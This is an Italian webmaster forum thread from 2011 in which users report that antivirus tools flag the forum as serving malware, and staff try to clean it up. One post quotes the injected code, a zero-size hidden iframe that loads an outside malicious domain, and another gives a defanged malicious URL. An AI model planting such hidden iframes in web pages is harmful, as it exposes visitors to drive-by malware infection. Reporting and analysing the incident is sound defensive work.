Un Evento Unico. 5 Sale. 27 Interventi. SEO, SOCIAL, E-Commerce, Mobile, Turismo.
CLICCA QUI e SCOPRI DI PIù X Chiudi
 
Forum GT: Condividiamo idee e conoscenza Forum GT: Condividiamo idee e conoscenza


Condividi questo contenuto nei Social Network:
Ti stiamo aspettando: Registrati subito e gratis. Entra a far parte di una delle comunità più attive in Italia. Se hai dimenticato i tuoi dati li puoi recuperare subito.


Vai indietro   Forum per Webmaster: Condividiamo Idee e Conoscenza > GT Club > Problemi col ForumGT?
Benvenuto! Forum Regole FAQ Lista utenti Calendario Segna come letti

Problemi col ForumGT? Chiedi qui; lo staff risponde

Hey Amico Visitatore,
Condividi con noi le tue idee e la tua conoscenza Aprendo una nuova discussione nella sezione Problemi col ForumGT?


Rispondi
 
LinkBack Strumenti di discussione
Vecchio 02-06-11, 04:08   #1 (permalink)
User
 
L'avatar di Xlogic
 
Data di registrazione: Jan 2011
Ubicazione: Torino
Messaggi: 190
Virus

Nod32 segnala la minaccia di un Virus nel Forum rendendo la navigazione impossibile.

Il Virus è HTML/iframe.BGen virus

Saluti
__________________
- Xlogic.org - Hosting Professionale.Reseller.Vps
Xlogic non in linea   Rispondi citando
Vecchio 02-06-11, 09:01   #2 (permalink)
ModSenior
 
L'avatar di marcocarrieri
 
Data di registrazione: Jul 2009
Ubicazione: Rovigo
Messaggi: 14,726
Invia un messaggio tramite MSN a marcocarrieri Invia un messaggio tramite Skype a marcocarrieri
Grazie per la segnalazione.
Abbiamo preso subito in considerazione grazie.
marcocarrieri non in linea   Rispondi citando
Vecchio 02-06-11, 11:10   #3 (permalink)
 
L'avatar di Giorgiotave
 
Data di registrazione: Oct 2004
Ubicazione: Monasterace
Messaggi: 34,892
Invia un messaggio tramite Skype a Giorgiotave
Lo segnala ancora?
Giorgiotave ora è in linea   Rispondi citando
Vecchio 02-06-11, 11:42   #4 (permalink)
User
 
L'avatar di vnt54
 
Data di registrazione: Feb 2010
Ubicazione: Prato
Messaggi: 186
Si,il mio Kaspersky internet security segnala URL dannoso.

Questo il link che segnala:-

02/06/2011 00:27:39 Internet Explorer Negato:
h t t p(slash slash)
free-poli(punto)
vv(punto)cc(slash)QQkFBwQHBQEDBwYBEkcJBQcEAgEMDQcG Bg== (analisi tramite il database delle URL sospette)


__________________
Terra di paura e vampiri..la transilvania?No..la banca

Ultima modifica di vnt54 : 02-06-11 11:46. Motivo: Aggiunto url sospetto
vnt54 non in linea   Rispondi citando
Vecchio 02-06-11, 11:53   #5 (permalink)
 
Data di registrazione: Nov 2008
Ubicazione: Novara/Vercelli
Messaggi: 404
Invia un messaggio tramite MSN a glm2006ITALY Invia un messaggio tramite Skype a glm2006ITALY
Ciao giorgio....

Oggi c'è qualcosa che non quadra.... sia MSE2 sia Malwarebytes segnalano problemi con giorgiotave.it.

Il presunto virus fa avviare la java machine....
__________________
il sito web della mia attività: www.webepc.it
glm2006ITALY non in linea   Rispondi citando
Vecchio 02-06-11, 11:59   #6 (permalink)
 
Data di registrazione: Nov 2008
Ubicazione: Novara/Vercelli
Messaggi: 404
Invia un messaggio tramite MSN a glm2006ITALY Invia un messaggio tramite Skype a glm2006ITALY
Ora è "scattato" anche Opera Browser
__________________
il sito web della mia attività: www.webepc.it
glm2006ITALY non in linea   Rispondi citando
Vecchio 02-06-11, 13:17   #7 (permalink)
User
 
L'avatar di Xlogic
 
Data di registrazione: Jan 2011
Ubicazione: Torino
Messaggi: 190
Si, purtroppo lo segnala ancora.

Con I.E. e Chrome il Forum è irraggiungibile, mentre con Firefox dopo circa 5 secondi restituisce la pagina "Impossibile visualizzare la pagina".

linkscanner.explabs.com/linkscanner/default.aspx

Saluti
__________________
- Xlogic.org - Hosting Professionale.Reseller.Vps
Xlogic non in linea   Rispondi citando
Vecchio 02-06-11, 13:25   #8 (permalink)
ModSenior
 
L'avatar di marcocarrieri
 
Data di registrazione: Jul 2009
Ubicazione: Rovigo
Messaggi: 14,726
Invia un messaggio tramite MSN a marcocarrieri Invia un messaggio tramite Skype a marcocarrieri
Anche a me con AVG purtroppo.
marcocarrieri non in linea   Rispondi citando
Vecchio 02-06-11, 16:11   #9 (permalink)
 
L'avatar di Giorgiotave
 
Data di registrazione: Oct 2004
Ubicazione: Monasterace
Messaggi: 34,892
Invia un messaggio tramite Skype a Giorgiotave
Forse abbiamo risolto...
Giorgiotave ora è in linea   Rispondi citando
Vecchio 02-06-11, 16:19   #10 (permalink)
User
 
L'avatar di vnt54
 
Data di registrazione: Feb 2010
Ubicazione: Prato
Messaggi: 186
Kaspersky non segnala più l'URL nocivo,però segnala una richiesta dalle isole coocos...non saprei...
__________________
Terra di paura e vampiri..la transilvania?No..la banca
vnt54 non in linea   Rispondi citando
Vecchio 02-06-11, 16:32   #11 (permalink)
User
 
Data di registrazione: Sep 2010
Messaggi: 188
Purtroppo non è stato risolto.

E' sempre presente la minaccia che crea il codice:


Quote:

<iframe src="pokut.vv.cc/QQkFBwQHBQEDBwYBEkcJBQcEAgEMDQcGBg==" width="0" height="0" frameborder="0"></iframe>
__________________
Creo
one_to_one non in linea   Rispondi citando
Vecchio 02-06-11, 16:49   #12 (permalink)
 
Data di registrazione: Nov 2008
Ubicazione: Novara/Vercelli
Messaggi: 404
Invia un messaggio tramite MSN a glm2006ITALY Invia un messaggio tramite Skype a glm2006ITALY
Confermo: anche malware bytes antimalware "scatta"
__________________
il sito web della mia attività: www.webepc.it
glm2006ITALY non in linea   Rispondi citando
Vecchio 02-06-11, 16:55   #13 (permalink)
User
 
Data di registrazione: Sep 2010
Messaggi: 188
Dall'ultima analisi risulta essere un codice che viene eseguito lato server.

Non vi è alcuna esecuzione di codice client side.

L'attacco a questo punto credo abbia inserito del codice che inserisce il codice di marcatura intruso proprio lato server.
__________________
Creo
one_to_one non in linea   Rispondi citando
Vecchio 02-06-11, 18:46   #14 (permalink)
User
 
L'avatar di Xlogic
 
Data di registrazione: Jan 2011
Ubicazione: Torino
Messaggi: 190
Adesso sembra pulito, anche nella navigazione.
__________________
- Xlogic.org - Hosting Professionale.Reseller.Vps
Xlogic non in linea   Rispondi citando
Vecchio 02-06-11, 21:47   #15 (permalink)
 
Data di registrazione: Nov 2008
Ubicazione: Novara/Vercelli
Messaggi: 404
Invia un messaggio tramite MSN a glm2006ITALY Invia un messaggio tramite Skype a glm2006ITALY
Nulla: Malwarebytes "scatta" ancora....
__________________
il sito web della mia attività: www.webepc.it
glm2006ITALY non in linea   Rispondi citando
Rispondi


Strumenti di discussione

Regole di scrittura
Non puoi postare nuove discussioni
Non puoi rispondere alle discussioni
Non puoi allegare file
Non puoi editare i tuoi post

BB code is Attivo
smilies è Attivo
[IMG] il codice è Attivo
Il codice HTML è Disattivato
Trackbacks are Attivo
Pingbacks are Attivo
Refbacks are Disattivato
Vai al forum



Tutti gli orari sono GMT +3. Attualmente sono le 21:45.




Forum GT - © 2004-2009 GT idea S.r.l P.iva 02418200800 - Privacy/Disclaimer

SEO by vBSEO 3.2.0 ©2008, Crawlability, Inc.